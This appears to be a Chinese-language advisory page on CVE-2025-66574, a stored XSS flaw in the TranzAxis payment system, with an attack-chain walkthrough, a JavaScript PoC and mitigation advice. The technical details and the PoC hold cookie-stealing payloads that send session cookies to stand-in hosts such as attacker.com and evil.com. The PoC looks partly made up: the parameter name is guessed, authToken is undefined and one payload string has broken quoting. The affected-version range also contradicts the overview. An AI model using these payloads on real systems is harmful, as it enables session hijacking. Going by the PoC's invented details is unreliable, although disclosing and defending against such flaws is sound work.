CVE-2025-66574 | TranzAxis存储型XSS漏洞允许窃取会话Cookie

漏洞信息

漏洞编号

CVE-2025-66574

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

TranzAxis 3.2.41.10.26

漏洞概述

CVE-2025-66574是发现于TranzAxis支付系统3.2.41.10.26版本中的存储型跨站脚本(XSS)漏洞。该漏洞存在于系统的「Open Object in Tree」端点中，允许已认证的低权限用户在系统功能中注入恶意JavaScript代码。由于漏洞为存储型，恶意脚本会被永久保存在系统中，当其他用户访问相关功能时，攻击payload会自动执行。攻击者可利用此漏洞窃取受害者的会话Cookie、劫持用户会话，进而可能获取更高权限或执行敏感操作。CVSS评分5.4，属于中危漏洞，需要用户交互才能触发，但攻击复杂度低，可通过网络远程利用。

技术细节

该漏洞为存储型XSS，攻击者通过「Open Object in Tree」端点的参数注入恶意JavaScript代码。攻击流程如下：1) 攻击者以低权限用户身份登录TranzAxis系统；2) 在「Open Object in Tree」功能的输入字段中注入XSS payload，如<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>；3) 由于系统未对用户输入进行充分过滤和转义，恶意脚本被存储在数据库中；4) 当其他用户（如管理员）访问同一功能或触发相关操作时，存储的恶意脚本被执行；5) 受害者浏览器中的Cookie信息被发送到攻击者控制的服务器。攻击者获取Cookie后，可构造Session劫持攻击，冒充合法用户身份进行操作。由于系统未实施严格的Content Security Policy，传统的XSS防护措施可能存在缺陷。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为TranzAxis 3.2.41.10.26版本，发现「Open Object in Tree」功能端点存在输入点

STEP 2

步骤2: 账户获取

攻击者获取系统低权限账户（通过社工、弱口令或内部泄露），成功登录TranzAxis系统

STEP 3

步骤3: XSS Payload注入

在「Open Object in Tree」端点的输入字段中注入恶意JavaScript代码，如<script>标签或事件处理器属性

STEP 4

步骤4: Payload存储

由于系统未对输入进行充分过滤和输出编码，恶意脚本被永久存储在数据库中

STEP 5

步骤5: 受害者触发

当其他用户（管理员或高权限用户）访问相关树节点功能或查看包含恶意内容的数据时，存储的XSS payload被执行

STEP 6

步骤6: 会话窃取

恶意JavaScript代码读取受害者浏览器的Cookie信息，并通过HTTP请求将Cookie发送到攻击者控制的服务器

STEP 7

步骤7: 会话劫持

攻击者使用窃取的Cookie构造请求，冒充合法用户身份，可能获取更高系统权限或执行敏感操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66574 PoC - Stored XSS in TranzAxis Open Object in Tree endpoint
// This PoC demonstrates how to exploit the stored XSS vulnerability

// Step 1: Authentication (Low-privilege user)
const loginData = {
    username: 'low_priv_user',
    password: 'password123',
    endpoint: 'https://target-tranzaxis.com/api/auth/login'
};

// Step 2: Inject XSS payload via Open Object in Tree endpoint
// The vulnerable parameter is typically 'objectName' or similar
const xssPayload = `<script>
    // Steal session cookies
    fetch('https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie));
    // Or perform session hijacking
    new Image().src='https://attacker.com/steal?data='+btoa(document.cookie);
</script>`;

const exploitData = {
    endpoint: 'https://target-tranzaxis.com/api/tree/open-object',
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + authToken
    },
    body: {
        'objectType': 'account',
        'objectName': xssPayload,  // XSS payload injection point
        'action': 'view'
    }
};

// Step 3: When victim (e.g., admin) views the tree object, XSS executes
// Step 4: Cookies are sent to attacker's server
console.log('XSS payload injected successfully');
console.log('Waiting for victim interaction...');

// Alternative payload for cookie theft:
const altPayload = `" onload="fetch('https://evil.com/c?c='+document.cookie)" `";
const cookieStealerPayload = `<img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie">`;

影响范围

TranzAxis < 3.2.41.10.26

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 对「Open Object in Tree」端点的所有输入参数实施严格的白名单验证；2) 启用Web应用防火墙(WAF)规则检测和拦截XSS攻击特征；3) 对现有数据库中的可疑数据进行清理和扫描；4) 监控异常访问日志和外部Cookie传输请求；5) 限制低权限用户对敏感功能的访问；6) 提醒用户避免点击来源不明的链接，减少被攻击风险；7) 考虑临时禁用受影响的树形导航功能直到完成安全修复。